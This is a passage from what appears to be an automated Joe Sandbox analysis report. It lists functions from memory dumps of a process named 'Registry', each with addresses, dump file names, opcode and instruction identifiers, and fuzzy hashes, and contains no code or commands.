                  • Instruction ID: b759bdc3085c74186bfb9ecd4c608b2d8d0dd5ca8353a8e75057113f0c40fdfb
                  • Opcode Fuzzy Hash: d442419431e55443d9a84bc40ec0ec79b5201febdd3aaf490ab42c2362a6b91d
                  • Instruction Fuzzy Hash: 7C21D130D0D58A8FF742B7B884592B97BE1EF46380F0444BAD41DC70D2EF38A8858325
                  Function 00007FF848F02458 Relevance: .1, Instructions: 78COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction ID: 00b8751a005fb34dffedf7b1dd06272f1fe49e248467efaad6cc7c9d9f6ab3c9
                  • Opcode Fuzzy Hash: 64b8e4785dd19d2cfc45b24faf610ebf3c1049e02f3179e191279de99e16e7c4
                  • Instruction Fuzzy Hash: 37310470D0C5298EEBA5EB54C8557FDB2B0AF56340F4040BAD44DA62D2EF782A88CF18
                  Function 00007FF848F0A5A1 Relevance: .1, Instructions: 75COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3dc06a81d8fb81bd22b508069ba1cc1a16d55451f5f5864cae09a47fc7da7a4e
                  • Instruction ID: 858e26a5832b7a87f3aec7064f494f2e574db4db9b5915b83d867f1920aab0d2
                  • Opcode Fuzzy Hash: 3dc06a81d8fb81bd22b508069ba1cc1a16d55451f5f5864cae09a47fc7da7a4e
                  • Instruction Fuzzy Hash: 4C214D7091864D8FDB85EF28C489AF97BF0FF2D305F01056AE80AC7291EB34A491CB40
                  Function 00007FF848F00A01 Relevance: .1, Instructions: 69COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 82e1b7b200a9db440d11dec8de43e92509f2e01ca924f2fa1f56fcdcd39a427d
                  • Instruction ID: 3a0a4bd0c8eb3cd74b017aa68ff1cf30749dc96c42d4647473d9d2cbcd36efb3
                  • Opcode Fuzzy Hash: 82e1b7b200a9db440d11dec8de43e92509f2e01ca924f2fa1f56fcdcd39a427d
                  • Instruction Fuzzy Hash: 1D115830D0D54E9EE780FB68C8496BA7BA0FF9A385F4045B6D809D61D2EF38A5448744
                  Function 00007FF848F034AC Relevance: .1, Instructions: 65COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e8b206853fb3125206fb415520f13821aa18ad2cbc09276154b8d85cfce39a50
                  • Instruction ID: 9895e6521248dfc4181523b645c92443ce9b2cb8c141c3d4541ee2649923ef17
                  • Opcode Fuzzy Hash: e8b206853fb3125206fb415520f13821aa18ad2cbc09276154b8d85cfce39a50
                  • Instruction Fuzzy Hash: 8621813094D68A4FD742EBB888595A97FF4EF4B310F0945EBD449CB0A2EB389449CB21
                  Function 00007FF848F0122D Relevance: .1, Instructions: 63COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fafb6184b14a00e7c0717a82b36191fd38ca1b3a0c19dd8c4cf69e17d04da7c
                  • Instruction ID: 7c07646d89e57adb6aba35e2986cefd83113327000175c3abc17169ad806a305
                  • Opcode Fuzzy Hash: 3fafb6184b14a00e7c0717a82b36191fd38ca1b3a0c19dd8c4cf69e17d04da7c
                  • Instruction Fuzzy Hash: 2A11BF70D0D64A8FEB59EF6888696B97BE0FF5A351F0000BAD40AC61D2FF246484C720
                  Function 00007FF848F0C9D0 Relevance: .1, Instructions: 62COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f00f459d398ff4ee7cd442618063b08522732b028ef5501a313114ba2589426b
                  • Instruction ID: c85bb79cf7f352a86f9f9c9b2e3e02d3b4aceeac899ded5aed0be2a45267e341
                  • Opcode Fuzzy Hash: f00f459d398ff4ee7cd442618063b08522732b028ef5501a313114ba2589426b
                  • Instruction Fuzzy Hash: FC116D3080E68D8FEB46EB6488691BA7BB1FF1A341F0405BBE409D71D2EF345850C754
                  Function 00007FF848F0BCE5 Relevance: .1, Instructions: 58COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 642e3c9cac45c4586d4a185c2db6583a5160bfa7cb5409ab2198a7cb8c0e8c6b
                  • Instruction ID: 700d107417fff01a1c2215e0dc763684d8bcfc017b6345b0637e2a329591961d
                  • Opcode Fuzzy Hash: 642e3c9cac45c4586d4a185c2db6583a5160bfa7cb5409ab2198a7cb8c0e8c6b
                  • Instruction Fuzzy Hash: 0C115B3091964E8FEB89EF28C8992BDBBE0FF29341F4009BAD419C6191EB75A550C704
                  Function 00007FF848F035C5 Relevance: .1, Instructions: 58COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: dfd23def3570cde61dac84235c09a89e5e867ef9d25ac4ca5a659fb8d498aaa8
                  • Instruction ID: 3d5d5dff85e7e1ee01ef8d87b1f74b57be942c7348dc5a1e5321e7d4520df6b9
                  • Opcode Fuzzy Hash: dfd23def3570cde61dac84235c09a89e5e867ef9d25ac4ca5a659fb8d498aaa8
                  • Instruction Fuzzy Hash: 63117070D1C54E8FEB95FF6884595B9BBA0FF19341F0004BAD41AC21D1EF34A5408704
                  Function 00007FF848F02F31 Relevance: .1, Instructions: 53COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8319f51bf73fffd6e69ae14fa55d2872cbf45c7dc8fe3f01156531c607d84c31
                  • Instruction ID: fc113d039c00ff4badb71566d2456c4f69d5dfa1913b40d615c4c62b3f5c058d
                  • Opcode Fuzzy Hash: 8319f51bf73fffd6e69ae14fa55d2872cbf45c7dc8fe3f01156531c607d84c31
                  • Instruction Fuzzy Hash: C701DF3091C64E8FE752FB6488482B97BE0FF1A382F4505B6D808C31E6FB34E0408710
                  Function 00007FF848F005D8 Relevance: .0, Instructions: 50COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 229bf6880a69ab69fce853015f8a780347f93a79dd598caf5c377d1f9887fa98
                  • Instruction ID: 1f793f9d5b0b574d655bb8b5ca8ce3df0fd9d91a3660cb2c6032ef0f5caff6be
                  • Opcode Fuzzy Hash: 229bf6880a69ab69fce853015f8a780347f93a79dd598caf5c377d1f9887fa98
                  • Instruction Fuzzy Hash: 6A018C3090990E8FDB58EF24C0596B977A1FF5A345F10447EE40EC21D1EB31A590CB44
                  Function 00007FF848F114CB Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2289de600dd08e2926e71f5047a2b50ff0041560397b94d402c24bb05ab428b7
                  • Instruction ID: 66a179db6dfdbc9c0665d75f9e022ab75045b5bb89c531df9a3c3d903119629e
                  • Opcode Fuzzy Hash: 2289de600dd08e2926e71f5047a2b50ff0041560397b94d402c24bb05ab428b7
                  • Instruction Fuzzy Hash: 1511F831A0826E8EDB64EB54D854BFDB3B5EB54340F0055BAD40DA7281DB386994CB44
                  Function 00007FF848F0C0CA Relevance: .0, Instructions: 49COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ed007fec0231e5c8c5bc192bc7fc495cb8dddc751035174daa8aef0f02f29aa
                  • Instruction ID: d7582b679c46166c862f08f52d798a843b8902e12edf33cb83ff03b3090c28d3
                  • Opcode Fuzzy Hash: 6ed007fec0231e5c8c5bc192bc7fc495cb8dddc751035174daa8aef0f02f29aa
                  • Instruction Fuzzy Hash: 92014C3090994E8EEB88FF6884592BE7AE0FF19341F10047AD81AD21D1EB75A590C744
                  Function 00007FF848F0BE0E Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction ID: e22e982972602e29607d5bfc399560a8d7e76e9f9bdf249856d777e4ec8590ac
                  • Opcode Fuzzy Hash: 16743c0d09b60cb41aa584a5d1dbc85522347d441a0b472759febb11380e4a87
                  • Instruction Fuzzy Hash: 6311C570D1850ACFDB54EF94D484AEDB7F2EF59350F20452AE419A62D1EB3868908B44
                  Function 00007FF848F0290D Relevance: .0, Instructions: 47COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 58e6c9c251a993a93aa1fb3aed0bd41134b2232702df128f578ca045eab48a09
                  • Instruction ID: 57ac687a3996306db7e25758a6557f4446b396e27ad5db997f07a2ec21372914
                  • Opcode Fuzzy Hash: 58e6c9c251a993a93aa1fb3aed0bd41134b2232702df128f578ca045eab48a09
                  • Instruction Fuzzy Hash: 5A017C3190C64E8FE792FBA484496B97BE0FF5A341F4545B6D408C70A2EF38E584D714
                  Function 00007FF848F0AAE9 Relevance: .0, Instructions: 45COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 57a7882267bc55b1b309d3209aef8d166f1d79f3eeed87dc45d4d6488c83653e
                  • Instruction ID: 83803835eda9ad20c55a38b997220df97a021de8d1081b40a40db267c29bc08c
                  • Opcode Fuzzy Hash: 57a7882267bc55b1b309d3209aef8d166f1d79f3eeed87dc45d4d6488c83653e
                  • Instruction Fuzzy Hash: 32018F7194D6899FE742BB7888591A97FE1EF1A340F0505F2D409C70E2FB28A4848711
                  Function 00007FF848F02FA9 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ea49755c894d5a40d9bc05e97fee6ce7d995534aa3e34c0434ee67dd9e58b1e7
                  • Instruction ID: 6647a06ce78cae697fdeacce115079dedcb98d928b1dd983b23b111c8ef7b2de
                  • Opcode Fuzzy Hash: ea49755c894d5a40d9bc05e97fee6ce7d995534aa3e34c0434ee67dd9e58b1e7
                  • Instruction Fuzzy Hash: DF017131A0D6894FE752B77488596A97BE0EF5A381F0545B6D409CB0E6EF38A4448711
                  Function 00007FF848F01D3D Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52fe682f4383b6da3e5f50853b96d174b65688159be1bb289c4fda968de5d708
                  • Instruction ID: 0af0666dfc8ca1b2e3b9732532ba13beb2945faf87bc1308ad0b013c82878b26
                  • Opcode Fuzzy Hash: 52fe682f4383b6da3e5f50853b96d174b65688159be1bb289c4fda968de5d708
                  • Instruction Fuzzy Hash: 7701813080EA8D8FDB99EF2484556B97BA1EF56341F5400BAE808C61D2EB75D494C740
                  Function 00007FF848F00610 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9c84daf09ba0ff0d51b0811aa1a3211c873624102d018639787290722caf568c
                  • Instruction ID: e99e19425bc0ff51f0fac5202762d57bdb14ed371c897cbd83fcbd3410f38aae
                  • Opcode Fuzzy Hash: 9c84daf09ba0ff0d51b0811aa1a3211c873624102d018639787290722caf568c
                  • Instruction Fuzzy Hash: C101AD3481860E9EEB4AEB6484086BA77E0FF19345F20047FD80EC21D1EF35A594C720
                  Function 00007FF848F00608 Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 374672f808d4267e241b3a820f1841bdb99fe0c4a10d95971a85ce1c8cf6214b
                  • Instruction ID: f3baf0f0c95a8ee4ead8ca403870dd89ed762f9069c574f5ec28e56c4930be09
                  • Opcode Fuzzy Hash: 374672f808d4267e241b3a820f1841bdb99fe0c4a10d95971a85ce1c8cf6214b
                  • Instruction Fuzzy Hash: C5016934818A0E9EEB5AEB6480582BA77E0FF19345F6008BFE40EC21D1EF35A590C614
                  Function 00007FF848F01240 Relevance: .0, Instructions: 41COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: edce84702d84775aaccfce39c23007f91340cb31a28b8f2f95ffaecf68b5bde5
                  • Instruction ID: 903ec7aee5941ac68565c1e07a9fa12adaac685ee7ad93f399308d8c7e60d2d7
                  • Opcode Fuzzy Hash: edce84702d84775aaccfce39c23007f91340cb31a28b8f2f95ffaecf68b5bde5
                  • Instruction Fuzzy Hash: 5AF0AF70D0E65B8EFB99BF6898183FA77E4FF56354F00017AE819C20C1FF2415908660
                  Function 00007FF848F0BE7A Relevance: .0, Instructions: 40COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction ID: d8232beb7212df2157eb4c5f4da9b388c77737c7f385db8797068b7092e3edd4
                  • Opcode Fuzzy Hash: b0b830105a69d29a0109896e084e355c2470d259f03f0d6f640e7d7a31e60dd7
                  • Instruction Fuzzy Hash: AF019070D1C10ACFDB18EF94D490AFDB7F2EF59350F20452AE409A22D1EB386990CB98
                  Function 00007FF848F14CE8 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 69d06eb25b9f6594013509aea5d2acec294a076ca65be14cc6a952305c9e4e78
                  • Instruction ID: 42c98026098ae82bbfda1b6ba0c4d54e36cbe7f585fab460f854e261f89570e7
                  • Opcode Fuzzy Hash: 69d06eb25b9f6594013509aea5d2acec294a076ca65be14cc6a952305c9e4e78
                  • Instruction Fuzzy Hash: 89F02835D0D68A8EEF99AF3858252B93AE1FFB5344F0404FED80CC20C2DF285854C60A
                  Function 00007FF848F005D0 Relevance: .0, Instructions: 39COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 631c8664641249616ca672e24a009e8e21ef8a889979160d49e62c247917f629
                  • Instruction ID: f5b97ba71443ad1a2f58bb94f7c0bd4aec385e33def142141f0a038e6831e7ed
                  • Opcode Fuzzy Hash: 631c8664641249616ca672e24a009e8e21ef8a889979160d49e62c247917f629
                  • Instruction Fuzzy Hash: 11F0623081EA4E8FEB54EF2494156FA77A4EF16348F50057AE80DC21D1EB35A594C784
                  Function 00007FF848F11142 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f10000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d523bc3793aed282fc520e476c3737614a636fe80f6befc3dc3356357528d8c6
                  • Instruction ID: f15a8ce6a100b56a9bb40cadbc13dbfadb2a0910dcdea027c192b918916f8889
                  • Opcode Fuzzy Hash: d523bc3793aed282fc520e476c3737614a636fe80f6befc3dc3356357528d8c6
                  • Instruction Fuzzy Hash: CEF01431A0866D8FDB54EF94D894AED73B1EB54351F0045A6C80DEB281EB34A9948B80
                  Function 00007FF848F02829 Relevance: .0, Instructions: 36COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2606fc63b337c4372c008265cbd4ce7ec4a4e914c672f1ad98254ca9aade7b6f
                  • Instruction ID: 24daadde2f48648949a72bf8e9991360bae9e21af6b640e6bc31067c6c295dc9
                  • Opcode Fuzzy Hash: 2606fc63b337c4372c008265cbd4ce7ec4a4e914c672f1ad98254ca9aade7b6f
                  • Instruction Fuzzy Hash: F8F0C23480E78E8FD75AAB3088681B93FA0FF16201F4504FBD408C60D2EB389448C751
                  Function 00007FF848F0289D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8ee54956b2644528aabe10f4ce4de9b01c621b0bd2145f3b887e5b8398a764e6
                  • Instruction ID: 7fc07d505599f1774148164cdcf153d2956f0e62349a5f6fca381bf268e67dec
                  • Opcode Fuzzy Hash: 8ee54956b2644528aabe10f4ce4de9b01c621b0bd2145f3b887e5b8398a764e6
                  • Instruction Fuzzy Hash: 3AF0B43081E78E8FD74A6B7088142B93BA0FF56205F4105BBE809C50E2EF389558D711
                  Function 00007FF848F00F8E Relevance: .0, Instructions: 28COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 97fbde6e0bfeffbe77d6d3fe6a1139a95bf8508000276e2ac0dff82202465d31
                  • Instruction ID: c3471f4863d6c0da79474cc582d9c629a610208252d7f7d36ce516652f9f06ad
                  • Opcode Fuzzy Hash: 97fbde6e0bfeffbe77d6d3fe6a1139a95bf8508000276e2ac0dff82202465d31
                  • Instruction Fuzzy Hash: 15F01D30D0A5198FEB50EB14C944BEEB7F1EB98349F2041B6C409A32D5EF796E848B58
                  Function 00007FF848F0242D Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F00000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f00000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 285a491ba775331639f619188253809f4189f7e4fe389479d3fdba62479d0954
                  • Instruction ID: e1dce635e0ff675f26569e857a6d6314a1830cb0c5a64790cf607449c2b3dbb6
                  • Opcode Fuzzy Hash: 285a491ba775331639f619188253809f4189f7e4fe389479d3fdba62479d0954
                  • Instruction Fuzzy Hash: 51F0AC30908519CFEB95FB00CC54BE973A1FB95354F5085A9C44ED71A1EE7869888B58
                  Function 00007FF848F0BEAF Relevance: .0, Instructions: 19COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000014.00000002.2161149961.00007FF848F0A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F0A000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_7ff848f0a000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2362fcf7aedc86f85b7f86231e1d89ec003add7762da3abbb441079b0a828311
                  • Instruction ID: 07ada39ead5ff49ba8d57093d6e70542f6bdd2f4b496fdd8ad36e00915415d0c
                  • Opcode Fuzzy Hash: 2362fcf7aedc86f85b7f86231e1d89ec003add7762da3abbb441079b0a828311
                  • Instruction Fuzzy Hash: 8ED04235A1892DCFDF50EB98D8815EDB3B4FB59351F400126D51DD7181DB6468118B40

                  Executed Functions

                  Function 00007FF848F33645 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: W_H
                  • API String ID: 0-126398842
                  • Opcode ID: cdbcc3c39e508760777ea6ba4d792aa2b4d56a3b8a58b12ef7014231e02dd8a0
                  • Instruction ID: 594aa74043678cecf723b22f2693bb2f2191d1e8cd9a7b129ab2570f203ed97d
                  • Opcode Fuzzy Hash: cdbcc3c39e508760777ea6ba4d792aa2b4d56a3b8a58b12ef7014231e02dd8a0
                  • Instruction Fuzzy Hash: 2D91CE71D1D94A8FE748EB6CE8697A9BFE1FF4A390F5000BAC009C72C6CF6819458B45
                  Function 00007FF848F32248 Relevance: 1.3, Strings: 1, Instructions: 79COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: H
                  • API String ID: 0-2852464175
                  • Opcode ID: d190d8915767b396151e0a7c4b5e6f7f98c284f4696a1956bb970a0302253a61
                  • Instruction ID: c259a705623e1159004e3909a308824ea75082e60ebe228b6a688629983402e1
                  • Opcode Fuzzy Hash: d190d8915767b396151e0a7c4b5e6f7f98c284f4696a1956bb970a0302253a61
                  • Instruction Fuzzy Hash: 8421D13190D54A8FF745B77888492A97BE0EF46381F0404B7D41DD70D2EF38A8468365
                  Function 00007FF848F3122D Relevance: 1.3, Strings: 1, Instructions: 63COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: edaf8dc2a7cc28fae707474f3d0a16e19e7c511362071307a8a08dc44f3aa395
                  • Instruction ID: 3cc869e202e9ca448496c3a467a0044b258a6787934fd7e11172a4b559c773bc
                  • Opcode Fuzzy Hash: edaf8dc2a7cc28fae707474f3d0a16e19e7c511362071307a8a08dc44f3aa395
                  • Instruction Fuzzy Hash: FB11B270D0D64E8FEB59EB6888592B97BE0FF5A351F0005BBE409D60D2EF259584C720
                  Function 00007FF848F31240 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.2155525376.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_7ff848f30000_Registry.jbxd
                  Similarity
                  • API ID:
                  • String ID: PyH
                  • API String ID: 0-553442046
                  • Opcode ID: 40b59579455f3efcb266574b66dc942f09c11f3829b677d613dd012b4a5f4436
                  • Instruction ID: d3cf586ee7232f5038e35c41edee613674ca39a7859611cdfad747b651495214
